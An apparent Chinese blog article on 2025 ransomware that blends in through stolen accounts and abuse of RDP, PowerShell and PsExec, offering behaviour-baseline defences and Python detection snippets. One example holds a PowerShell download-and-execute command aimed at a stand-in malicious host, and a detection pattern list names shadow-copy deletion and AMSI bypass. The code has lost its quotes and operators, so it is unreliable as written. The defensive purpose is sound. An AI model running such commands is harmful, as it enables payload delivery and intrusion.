当前位置: 首页 > article >正文

2025 年勒索软件隐匿化攻击演进与行为基线防御研究

摘要据 Talos 2025 年度网络安全回顾报告显示勒索软件攻击已从暴力突破转向合法访问隐匿渗透攻击者依托钓鱼、有效账号与系统自带管理工具实现无感知横向移动传统边界防护显著失效。2025 年数据表明约 40% 初始访问源于网络钓鱼RDP、PowerShell、PsExec 成为攻击者高频使用的合法工具制造业与专业技术服务为首要目标Qilin、Akira、Play 等团伙主导攻击生态LockBit 在执法打击下影响力下降。本文以隐匿化攻击为核心系统分析勒索软件 “融入正常操作” 的战术逻辑、身份滥用路径、工具滥用机理与行业受害特征给出行为基线建模、异常检测、身份加固与应急响应的工程化方案附可落地代码示例嵌入反网络钓鱼技术专家芦笛的专业判断形成从态势、机理、检测到防御的完整论证闭环。研究表明以身份为中心、以行为异常检测为核心、覆盖资产基线与最小权限的纵深防御体系可有效应对隐匿化勒索威胁为政企机构提供可落地的安全实践支撑。关键词勒索软件隐匿渗透合法访问行为基线身份安全横向移动1 引言勒索软件威胁在 2025 年呈现战术范式迁移暴力破解、漏洞狂轰、恶意文件落地等 “破门而入” 式攻击大幅减少取而代之的是获取合法权限、模仿正常操作、长期潜伏渗透的隐匿模式如同攻击者已成为内网 “合法成员”。Talos 年度报告明确指出当前勒索攻击的核心策略是Blending in融入环境通过有效账号、系统原生管理工具与正常业务行为高度重叠大幅降低告警率、延长驻留时间、提升攻击成功率。这种转变带来三大防御困境一是告警疲劳合法工具滥用难以被规则识别二是边界失效攻击者无需突破防线即可进入内网三是溯源困难行为与正常运维高度相似取证与定性难度陡增。反网络钓鱼技术专家芦笛指出隐匿化勒索攻击将身份作为突破口以社会工程为前置手段以合法工具为横向移动载体形成 “偷钥匙、走正门、干坏事” 的完整链路传统以漏洞与特征为核心的防护体系全面承压。本文严格依托 Talos 2025 年勒索软件回顾报告数据与结论聚焦隐匿化攻击战术、身份滥用机理、工具滥用特征、行业目标分布、团伙生态演变构建行为基线驱动的防御框架提供可复现的检测代码与工程实践确保论证严谨、技术准确、逻辑闭环为应对新一代勒索威胁提供学术参考与实践指南。2 2025 年勒索软件攻击总体态势与核心特征2.1 攻击范式从暴力突破到隐匿渗透传统勒索攻击依赖外部突破如漏洞利用、端口暴破、恶意邮件附件等行为特征明显易被 EDR、防火墙、网关防护拦截。2025 年主流攻击模式完成范式转换核心表现为初始访问合法化约 40% 攻击通过网络钓鱼获取有效账号攻击者使用被盗凭证登录流量与行为均为合法状态。横向移动工具化攻击者优先使用 RDP、PowerShell、PsExec 等系统自带或运维标配工具与正常管理员操作无明显差异。行为轨迹常态化登录、巡检、配置查询、远程执行等步骤模仿真实运维规避基于规则的异常检测。攻击目标精准化放弃广撒网聚焦制造业、专业技术服务等监控难度高、业务连续性敏感的行业。Talos 指出现代勒索攻击更像象棋布局逐步抢占关键节点而非一次性强攻防御方的核心挑战从 “堵漏洞” 转向 “辨行为”。2.2 初始访问与身份滥用钓鱼成为第一入口身份贯穿攻击全生命周期从初始接入、横向移动到载荷执行有效账号均为核心支撑。钓鱼占比最高约 40% 初始访问通过钓鱼邮件、仿冒页面、社交工程实现骗取账号密码、会话令牌或远程协助权限。账号价值提升攻击者获取普通账号后通过票据传递、哈希传递、本地提权等方式提升权限最终控制域管等高价值账号。远程服务滥用RDP、VPN、Quick Assist 等合法远程通道被大量用于初始接入与持久化控制。反网络钓鱼技术专家芦笛强调钓鱼从 “辅助手段” 升级为勒索攻击的标准入口攻击者不再依赖零日漏洞而是通过欺骗获取合法身份防御必须前移至社会工程与身份治理环节。2.3 工具滥用系统原生工具成为攻击主力勒索组织大规模使用LOLBinsLiving-off-the-Land Binaries即系统自带合法二进制程序执行恶意操作典型工具如下表格工具 正常用途 攻击者滥用方式 隐蔽性RDP 远程桌面管理 合法登录、会话劫持、内网漫游 极高流量与正常远程操作一致PowerShell 自动化运维 无文件执行、载荷下载、权限提升 极高系统原生日志易被忽略PsExec 远程进程执行 批量横向移动、全网加密部署 极高运维高频工具无异常特征攻击者与正常用户的差异不在于使用什么工具而在于使用目的与行为模式正常运维用于维护攻击者用于扩张权限、窃取数据、部署勒索。2.4 目标行业与攻击团伙生态重点目标行业制造业位居首位系统复杂、OT 与 IT 融合、运维压力大、监控覆盖不足易被长期渗透。专业、科学与技术服务次之跨系统、跨组织访问频繁权限边界模糊攻击扩散成本低。勒索团伙格局演变Qilin位居榜首采用双重勒索模式2025 年月均受害者超 40 家威胁持续性强。Akira、Play分列二、三位战术持续迭代吸纳解散团伙如 LockBit成员能力快速增强。LockBit在持续执法打击下排名跌至 35 位生态影响力显著衰退。时间规律1 月攻击活跃度连续两年偏低与节假日及东欧公共假期相关为防御方演练、加固提供窗口期。3 隐匿化勒索软件攻击全链路机理分析3.1 攻击链隐匿化七步模型基于 Talos 报告与实战案例提炼 2025 年隐匿化勒索攻击标准链路社会工程入口钓鱼邮件、仿冒站点、虚假客服骗取凭证或远程授权。合法初始接入使用被盗账号登录 VPN、RDP、Web 管理后台无恶意流量特征。内网侦察系统命令、PowerShell 脚本收集资产、权限、网段信息伪装巡检。权限提升利用配置缺陷、票据传递、本地提权获取更高权限。横向移动借助 RDP、PsExec、WinRM 批量渗透内网主机行为接近运维操作。数据窃取与破坏备份删除、卷影副本清除、核心数据加密准备。双重勒索文件加密 数据泄露威胁迫使支付赎金。整个过程无恶意代码落地、无异常端口扫描、无暴力破解行为完全融入正常操作。3.2 身份滥用核心机理有效账号降低攻击成本与暴露风险成为攻击链的 “通用钥匙”。账号获取钓鱼、信息窃取器、弱口令暴破、配置泄露。权限扩张Pass-the-Hash、Pass-the-Ticket、Kerberoasting 等票据滥用。身份伪装使用合法账号执行操作日志归属正常用户难以定位恶意行为主体。防御短板在于多数组织只验证账号是否合法不校验行为是否合理。3.3 横向移动隐匿化实现横向移动是隐匿化攻击的关键环节攻击者依托合法工具与权限实现无感知扩散RDP 会话劫持使用 tscon 等系统工具接管已存在会话无需重新认证用户无感知。PowerShell 远程执行通过 WinRM 在内网批量执行脚本开启远程服务、关闭安全防护。PsExec 批量部署使用域管权限在多台服务器同步执行勒索载荷短时间内全网加密。上述操作均为合法工具的合法调用传统基于特征的检测机制完全失效。3.4 攻击收益与成本模型隐匿化攻击在成本、风险、成功率上形成全面优势技术门槛降低无需漏洞挖掘与恶意代码开发只需掌握账号获取与工具使用。暴露风险极低行为与正常操作重叠告警少、驻留时间长。收益确定性高精准渗透、长期潜伏确保数据加密与泄露双重胁迫生效。4 基于行为基线的隐匿攻击检测方法与代码实现4.1 检测思路从规则匹配到行为基线建模应对隐匿化攻击的核心是建立正常行为基线识别偏离模式包括用户行为基线登录时间、登录地点、常用主机、操作频次、权限范围。工具使用基线RDP/PsExec/PowerShell 的正常用途、执行参数、访问目标。资产通信基线主机间正常访问关系、远程操作频次、异常外联行为。反网络钓鱼技术专家芦笛指出行为基线检测可有效区分 “合法账号、非法行为”是破解隐匿化勒索攻击的核心技术路径。4.2 RDP 异常登录检测代码import timefrom datetime import datetimedef check_rdp_abnormal(username: str, src_ip: str, login_time: str,user_baseline: dict, threshold_hours: int 2) - bool:基于基线检测RDP异常登录非常用IP、非常用时段、高频登录user_baseline示例{usual_ips:[192.168.1.0/24], usual_hours:[9,18], max_freq:3}# 1. 检测源IP是否异常ip_in_baseline any(src_ip.startswith(ip[:-4]) for ip in user_baseline[usual_ips])# 2. 检测登录时段是否异常hour datetime.strptime(login_time, %Y-%m-%d %H:%M:%S).hourtime_normal user_baseline[usual_hours][0] hour user_baseline[usual_hours][1]# 3. 检测登录频率是否异常freq_over user_baseline.get(recent_login, 0) user_baseline[max_freq]return not (ip_in_baseline and time_normal) or freq_over# 示例user_baseline {usual_ips: [192.168.1.], usual_hours: [8, 20], max_freq: 5}print(check_rdp_abnormal(admin, 10.0.0.123, 2025-12-20 23:10:00, user_baseline)) # True4.3 PowerShell 恶意行为检测代码import redef detect_malicious_powershell(cmdline: str) - bool:检测PowerShell恶意命令无文件执行、下载载荷、隐藏窗口、绕过AMSI、删除卷影副本malicious_patterns [r-ExecutionPolicy\sBypass, r -nop , r-NonInteractive,rDownloadString|DownloadFile, rhttp[s]?://, r[a-zA-Z0-9]{20,},rRemove-Item\sShadowCopy, rvssadmin\sdelete\sshadows,rAMSI\sDisable, rReflection\.Assembly]for pat in malicious_patterns:if re.search(pat, cmdline, re.IGNORECASE):return Truereturn False# 示例ps_cmd powershell -nop -ExecutionPolicy Bypass -c IEX (New-Object Net.WebClient).DownloadString(http://mal.example.com/payload)print(detect_malicious_powershell(ps_cmd)) # True4.4 PsExec 横向移动异常检测代码def detect_psexec_lateral_movement(src_host: str, target_list: list,baseline_hosts: dict, max_target: int 3) - bool:检测PsExec批量横向移动短时间访问大量非常用目标主机normal_targets baseline_hosts.get(src_host, [])abnormal_count sum(1 for t in target_list if t not in normal_targets)return abnormal_count max_target or len(target_list) max_target# 示例baseline {PC-01: [Server-01, Printer-01]}print(detect_psexec_lateral_movement(PC-01, [Server-02,Server-03,Server-04,DB-01], baseline)) # True4.5 异常行为综合评分引擎将多维度异常指标加权评分超过阈值触发告警降低误报率RDP 异常30 分PowerShell 可疑命令40 分PsExec 批量横向50 分异常时间 / IP20 分总分≥70 分触发预警≥100 分启动应急响应。5 面向隐匿化勒索攻击的纵深防御体系构建5.1 身份安全层防御攻击入口强化多因素认证MFAVPN、RDP、Web 后台、邮件系统强制开启阻断钓鱼账号直接登录。最小权限原则普通用户无远程桌面、无脚本执行、无批量操作权限仅开放必要权限。凭据防护禁止明文存储、禁用内存明文密码、定期轮换高权限账号、监控票据滥用。钓鱼防御常态化培训、邮件网关检测、仿冒域名拦截、远程协助行为管控。反网络钓鱼技术专家芦笛强调身份是隐匿攻击的核心突破口必须以零信任架构实现持续验证、动态授权、权限最小化。5.2 行为检测层核心防御能力构建动态行为基线覆盖用户、主机、工具、通信四维度自动学习正常模式。合法工具滥用监控重点监控 RDP、PowerShell、PsExec、WMIC、Certutil 等工具的异常使用。无文件攻击检测加强 PowerShell、WMI、Script 等内存执行行为监控。横向移动检测识别批量远程操作、异常网段访问、跨域高频连接。5.3 资产与系统加固层完善资产清单全覆盖 IT/OT 资产明确用途、权限、责任人、网络边界。系统安全配置禁用不必要远程服务、关闭高危端口、限制 PowerShell 执行权限。日志与审计开启进程命令行日志、远程登录日志、权限变更日志集中存储防篡改。网络隔离关键服务器分区、IT/OT 隔离、运维区隔离限制横向移动范围。5.4 应急与恢复层备份体系3-2-1 备份原则离线备份、空气隔离、定期恢复演练。应急响应明确流程、权限、联系人预设隔离、阻断、取证、恢复步骤。安全演练利用 1 月等低发期开展勒索防御演练验证检测与响应能力。威胁情报接入团伙、IoC、恶意域名情报实现前置拦截。6 防御实践落地建议与长期演进方向6.1 短期落地1–3 个月强制高权限账号开启 MFA梳理并回收过度权限。部署 RDP/PowerShell/PsExec 行为监控启用本文检测规则。完成离线备份验证确保可快速恢复。开展全员钓鱼演练提升识别能力。6.2 中期建设3–12 个月建设用户与实体行为分析UEBA平台实现基线自动化建模。完善零信任架构全流程动态认证与授权。建立跨部门协同机制覆盖 IT、OT、安全、业务。加入行业威胁情报联盟共享隐匿攻击 TTPs。6.3 长期演进方向AI 驱动行为分析用无监督学习自动识别未知隐匿模式。攻防自动化对抗AI 实时识别、动态策略调整、自动隔离响应。全链路追溯从钓鱼入口到勒索执行全程追踪提升溯源与定罪能力。合规与治理完善数据安全、应急备案、供应链安全管控。7 结语2025 年勒索软件以隐匿化、合法访问、行为融入为核心策略标志着威胁进入高阶对抗阶段。暴力突破时代落幕身份滥用与工具滥用成为主流40% 初始访问源于钓鱼RDP、PowerShell、PsExec 等系统工具成为攻击主力制造业与专业服务成为重点目标Qilin 等团伙主导攻击生态。防御范式必须同步升级从边界防护转向以身份为中心、以行为基线为核心的纵深防御通过有效账号管控、异常行为检测、最小权限、网络隔离、可靠备份形成闭环。本文基于 Talos 2025 年度报告系统论证隐匿化攻击的态势、机理、检测与防御提供可落地代码示例嵌入反网络钓鱼技术专家芦笛的专业判断形成完整论据闭环。研究表明只有将防御重心从 “堵漏洞” 转向 “辨行为”从 “信任身份” 转向 “验证行为”才能有效应对隐匿化勒索威胁保障机构运营连续性与数据安全。未来随着 AI 与社会工程深度融合隐匿攻击将更趋智能化防御方需持续迭代行为检测、身份治理与应急能力在动态对抗中保持安全优势。编辑芦笛公共互联网反网络钓鱼工作组

相关文章:

2025 年勒索软件隐匿化攻击演进与行为基线防御研究

摘要 据 Talos 2025 年度网络安全回顾报告显示,勒索软件攻击已从暴力突破转向合法访问隐匿渗透,攻击者依托钓鱼、有效账号与系统自带管理工具实现无感知横向移动,传统边界防护显著失效。2025 年数据表明,约 40% 初始访问源于网络钓…...

基于合法无代码平台滥用的新型钓鱼攻击机理与防御体系研究

摘要 2026 年 3 月卡巴斯基实验室披露针对 Bubble.io 等正规无代码开发平台的恶意滥用钓鱼攻击,攻击者依托平台高信誉域名、SSL 证书与可视化开发能力,快速生成高仿真钓鱼页面,绕过传统邮件网关与终端检测,实现账号凭证、多因素认…...

实战指南:基于快马AI开发具备核心功能的电商比价插件

最近在做一个电商比价插件的开发项目,正好用到了InsCode(快马)平台,整个过程特别顺畅,分享下我的实战经验。 项目背景与需求分析 电商比价插件是很多网购达人的刚需工具。核心要解决三个问题:实时比价、历史价格追踪和降价提醒。传…...

Phantom Stealer 凭证窃取机制分析与防御体系研究

摘要 Phantom Stealer 作为 2025 年下半年出现的新型多功能信息窃取木马,以多阶段感染、无文件驻留、强反检测与全维度凭证窃取为核心特征,通过伪装合法软件、脚本混淆、进程注入、 Heaven’s Gate 技术规避等手段,精准窃取浏览器密码、Cooki…...

贾子哲学思想理论体系研究:学术贡献、实证争议与文明治理范式创新——基于鸽姆智库创始人贾龙栋的综合评估

贾子哲学思想理论体系研究:学术贡献、实证争议与文明治理范式创新——基于鸽姆智库创始人贾龙栋的综合评估摘要 本文系统梳理鸽姆智库创始人贾龙栋(笔名贾子)的学术背景及其创立的贾子哲学思想理论体系。该体系以“1-2-3-4-5”层级架构为核心…...

贾龙栋与鸽姆智库:贾子哲学思想理论体系的构建、创新与全球影响 —— 基于跨学科视角的深度研究

贾龙栋与鸽姆智库:贾子哲学思想理论体系的构建、创新与全球影响 —— 基于跨学科视角的深度研究引言在人工智能技术迅猛发展与全球治理体系深刻变革的时代背景下,人类文明正面临前所未有的认知挑战与价值重构。一方面,技术能力的指数级增长与…...

Ubuntu 20.04安装搜狗输入法全攻略:从配置到常见错误解决

Ubuntu 20.04 中文输入终极方案:搜狗输入法深度配置指南 在Linux桌面环境中实现流畅的中文输入一直是许多用户的痛点。作为国内最受欢迎的中文输入法之一,搜狗输入法凭借其强大的词库和智能预测功能,成为Ubuntu用户的首选。本文将带你从零开始…...

阿里通义实验室FunAudioLLM实战:如何用SenseVoice快速搭建多语言语音识别系统(附代码)

基于SenseVoice构建多语言语音识别系统的工程实践指南 语音识别技术正在重塑人机交互的边界,而阿里通义实验室开源的FunAudioLLM项目中的SenseVoice模型,为开发者提供了一把打开多语言语音世界的钥匙。不同于传统ASR系统需要针对不同语言单独训练模型的繁…...

StreamIO:Arduino嵌入式统一I/O流与缓冲区抽象库

1. StreamIO 库概述StreamIO 是一个面向嵌入式 Arduino 生态的轻量级 I/O 抽象封装库,其核心设计目标是统一处理流式数据(Stream)与静态内存缓冲区(array buffer)的读写操作。在传统 Arduino 开发中,开发者…...

LeetCode 热题100——11.盛最多水的容器

题目: 给定一个长度为 n 的整数数组 height 。有 n 条垂线,第 i 条线的两个端点是 (i, 0) 和 (i, height[i]) 。 找出其中的两条线,使得它们与 x 轴共同构成的容器可以容纳最多的水。 返回容器可以储存的最大水量。 说明:你不…...

Linux时钟子系统:CCF框架与驱动开发实践

1. Linux时钟子系统概述在嵌入式Linux系统中,时钟管理是驱动开发的基础环节之一。时钟子系统负责为整个系统提供精确的时序控制,从CPU主频到外设工作时钟,都需要通过时钟子系统进行管理和配置。Linux内核通过CCF(Common Clock Fra…...

Vibe Coding氛围编程系列:AI 模型 服务选择之哪个模型编程能力最强?

前言 2026年,AI辅助编程早已告别了“单行代码补全”的初级阶段,正式进入了Vibe Coding(氛围编程) 的全新时代。所谓氛围编程,核心是AI能完全贴合开发者的编码思路、节奏与工作流,实现无断点、沉浸式的流畅…...

comsol复合相变墙体保温隔热,comsol论文复现建模仿真 模拟室外温度变化复合墙体温度变化过程

comsol复合相变墙体保温隔热,comsol论文复现建模仿真 模拟室外温度变化复合墙体温度变化过程,对比普通墙体的保温隔热性能大夏天顶着40度高温站阳台收衣服的时候,总想着要是墙体能像冰柜门一样隔热该多好。最近用COMSOL折腾了个复合相变墙体模…...

改进遗传算法求解分布式柔性作业车间调度问题 Matlab代码 考虑多工厂约束,以最小化最大完工...

改进遗传算法求解分布式柔性作业车间调度问题 Matlab代码 考虑多工厂约束,以最小化最大完工时间为目标函数,使用ipox、ux两种交叉方式,改进G-L-R初始化机制提升初始种群质量,使用变邻域搜索机制对空间进行局部搜索 更换关键工厂中…...

Arduino轻量URL编解码库:RFC 3986兼容的嵌入式urlencode/urldecode实现

1. 项目概述URLCode 是一个专为 Arduino 平台设计的轻量级 URL 编解码库,其核心目标是提供符合 RFC 3986 标准的application/x-www-form-urlencoded格式字符串的编码(urlencode)与解码(urldecode)能力。该库不依赖 Ard…...

机器人双目视觉定位系统设计与开发

机器人双目视觉定位系统设计与开发 摘要 双目视觉定位技术是机器人感知环境、实现自主导航和精准操作的核心技术之一。本系统基于双目立体视觉原理,利用Matlab平台完成了从相机标定、图像采集、立体匹配到三维坐标解算的完整流程。系统采用张正友标定法获取相机内外参数,通…...

光伏并网发电系统最大功率点跟踪(MPPT)技术研究

光伏并网发电系统最大功率点跟踪(MPPT)技术研究 第一章 绪论 1.1 研究背景与意义 随着全球能源危机和环境污染问题的日益严峻,太阳能作为一种取之不尽、用之不竭的清洁能源,受到了广泛关注。光伏并网发电系统已成为太阳能利用的主要形式。然而,光伏电池的光电转换效率较…...

本地部署DeepSeek并搭建量化交易系统:完整指南

本地部署DeepSeek并搭建量化交易系统:完整指南 1. 引言 随着大语言模型(LLM)的快速发展,其在金融领域的应用潜力日益凸显。DeepSeek作为一款高性能、开源的大模型,能够为量化交易系统提供强大的自然语言理解和生成能力,例如从新闻、研报中提取信号,辅助生成交易策略,…...

并联混合动力船舶能量管理策略与SOC约束优化研究

并联混合动力船舶能量管理策略与SOC约束优化研究 摘要 本文针对并联混合动力船舶能量管理问题,基于等效燃油消耗最小化策略(ECMS),构建了包含柴油机、电动机、电池及船舶动力学系统的仿真模型。通过调整电池荷电状态(SOC)约束范围,分析其对燃油经济性、电池寿命及系统…...

踩下油门的那一刻,P2并联混动系统开始了一场精密的能量博弈。咱们今天不聊枯燥的理论,直接钻进Simulink模型里看看这套系统怎么玩转发动机和电机的“二人转

基于Matlab/simulink的P2并联PHEV插电式混合动力汽车建模控制仿真模型(同轴、双轴并联插电混合动力汽车仿真模型) ——包括整车HCU控制单元、发动机模型、驱动电机模型、AMT5档自动变速箱模型、驾驶员模型、电池能量管理控制模型等,建模详细清…...

从Flash到I2C:盘点那些让你头疼的时序图符号,并教你用Python+逻辑分析仪自动解析

从Flash到I2C:时序图符号解析与Python自动化实战 第一次翻开某款Flash芯片的数据手册时,我被密密麻麻的时序图符号彻底击垮了。灰色交叉、斜坡箭头、省略号标记...这些看似简单的图形背后,隐藏着芯片厂商精心设计的通信规则。作为嵌入式开发者…...

收藏备用!AI大模型自学路线(小白/程序员专属),从入门到实战少走90%弯路

当下AI大模型已成技术领域的核心热点,无论是零基础小白,还是想转型进阶的程序员,都纷纷投身其中。但自学过程中,多数人都会陷入“找不到方向、学了不会用、越学越迷茫”的困境。今天就为大家整理一份系统、可落地、无冗余的AI大模…...

Word多级列表编号消失?别慌!用这个宏代码一劳永逸(附详细操作截图)

Word多级列表编号消失?三步根治方案与宏代码实战 写论文时目录编号突然消失?项目报告的多级列表格式莫名混乱?这种"幽灵问题"几乎困扰过每个深度使用Word的用户。传统方法往往只能临时修复,下次打开文档时问题依旧——直…...

告别命令行恐惧!在Ubuntu 20.04上像装App一样轻松安装Typora(附国内源配置)

告别命令行恐惧!在Ubuntu 20.04上像装App一样轻松安装Typora(附国内源配置) 第一次在Linux系统上安装软件时,面对黑底白字的终端窗口,很多人会本能地产生抗拒感。这种感受就像突然被丢进一个全英文的异国机场——你知道…...

nginx实验练习

[rootserver ~]# setenforce 0 [rootserver ~]# systemctl stop firewalld[rootserver ~]# systemctl disable firewalld[rootserver ~]# yum install nginx -y[rootserver ~]# nginx -V # 查看版本,编译器、配置参数等信息[rootserver ~]# syste…...

UWB定位算法避坑指南:如何避免常见错误并提升定位精度(含2025最新优化技巧)

UWB定位算法避坑指南:如何避免常见错误并提升定位精度(含2025最新优化技巧) 在工业4.0和智能物联网的浪潮中,超宽带(UWB)技术凭借其厘米级高精度定位能力,正在重塑智能制造、仓储物流和医疗监护…...

GESP到底有没有必要考?说说我的真实看法

“老师,GESP要不要考?考了能免考CSP初赛,值不值?” 每次信奥赛家长群里一聊到这个,就会吵起来。 有人说"CCF官方的,含金量高,必须考"。也有人说"证书没用,浪费钱浪费…...

产品经理、设计师必看:2026年6款AI界面生成工具实测,哪个最值得用?

过去,一款移动应用从需求文档到可交付原型,至少需要设计师投入 1~2 周时间。而今,借助 AI 界面生成工具,同样的工作可以压缩到几小时甚至几十分钟完成。目前AI界面生成工具正在重塑产品团队的工作方式。本文实测对比了 UXbot、Uiz…...

日结零工市场的权益保障困境与系统性治理路径

一、现象审视:弱势单元的权益真空日结零工作为弹性用工体系中最灵活、最底层的用工形态,其劳动者长期处于权益保障的真空地带。本文基于对B市线上日结零工市场的田野研究发现,日结零工劳动者面临三重结构性弱势:第一,法…...

一天一个开源项目(第62篇):lark-cli - 飞书/Lark 官方 CLI 与 AI Agent Skills

引言 “Built for humans and AI Agents.” 这是「一天一个开源项目」系列的第 62 篇文章。今天介绍的项目是 lark-cli(GitHub)。 需要在终端或 AI 工作流里操作飞书/Lark?lark-cli 是 larksuite 团队维护的官方 CLI:11 个业务域…...